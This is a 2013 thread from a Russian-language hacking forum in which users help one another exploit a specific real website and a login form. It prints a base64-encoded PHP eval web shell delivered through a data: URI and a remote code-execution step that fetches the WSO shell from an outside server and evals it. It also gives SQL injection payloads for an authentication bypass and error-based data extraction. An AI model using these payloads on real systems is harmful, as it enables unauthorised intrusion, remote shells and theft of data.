ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.10.2013, 12:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
16399
Репутация:
10
|
|
Сообщение от noviks
noviks said:
работает что так
что так
но файлы php не xочет показать
Что значит не хочет? Что пишет?
|
|
|
|
26.10.2013, 12:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
4709
Репутация:
0
|
|
Сообщение от Ganz Euler
Ganz Euler said:
Что значит не хочет? Что пишет?
ничего не пишет просто страница до конца не открывается и пусто
|
|
|
|
26.10.2013, 12:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
16399
Репутация:
10
|
|
Сообщение от noviks
noviks said:
ничего не пишет просто страница до конца не открывается и пусто
Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f '
|
|
|
|
26.10.2013, 12:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
4709
Репутация:
0
|
|
[QUOTE="Ganz Euler"]
Ganz Euler said:
Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f ' я об зтом сразу подумал, HTML код просто обрывается
|
|
|
|
26.10.2013, 12:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
4709
Репутация:
0
|
|
открыл /bin/sh но там одни крокозябры
|
|
|
|
26.10.2013, 12:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
16399
Репутация:
10
|
|
Неудивительно, /bin/sh бинарный файл.
Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.
|
|
|
|
26.10.2013, 12:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
4709
Репутация:
0
|
|
Сообщение от Ganz Euler
Ganz Euler said:
Неудивительно, /bin/sh бинарный файл.
Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.
она уже и не работает ,вчера зря спалил
|
|
|
|
26.10.2013, 14:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от noviks
noviks said:
она уже и не работает ,вчера зря спалил
ну раз дыру закрыли, разсказую, вобще не понимаю чё вы так долго там думали,
Сообщение от None
http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==&cmd=phpinfo%28%29;
этот кусок тут вобще не нужен был &cmd=phpinfo%28%29;
также как и PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==( в басе64 зашифрован код )
банально заливаете на другой серв код шелла, потом пишете код $a = file_get_contents("http://site.ru/wso.txt"); eval($a);
и усё, видите перед собой ваш шелл, там кругом права урезаны были, одни лишь папка была для записи cache
|
|
|
|
26.10.2013, 14:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
Есть идеи как провести иньекцию если фильтрует все символы кроме \
Executing: select * from user where username='admin\' and password='1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1alert("invalid password");history.back(-1)
Если вставить куда нибудь сторонние символы напишет nothing to do here)
Есть варианты?
|
|
|
|
26.10.2013, 14:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
16399
Репутация:
10
|
|
Сообщение от zombak18
zombak18 said:
Есть идеи как провести иньекцию если фильтрует все символы кроме \
Executing: select * from user where username='admin\' and password='1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1alert("invalid password");history.back(-1)
Если вставить куда нибудь сторонние символы напишет nothing to do here)
Есть варианты?
Ну смотри, ты ввёл логин admin\ и пароль 1. Получается:
select * from user where username=' admin\' and password='1'
Выделенное зелёным интерпретируется как строка. Варианты например:
зайти без пароля
select * from user where username=' admin\' and password=' or 1=1 -- '
Error-based эксплуатация:
select * from user where username=' admin\' and password=' or 1=((select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2))))-- '
Про "сторонние символы" не понял.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
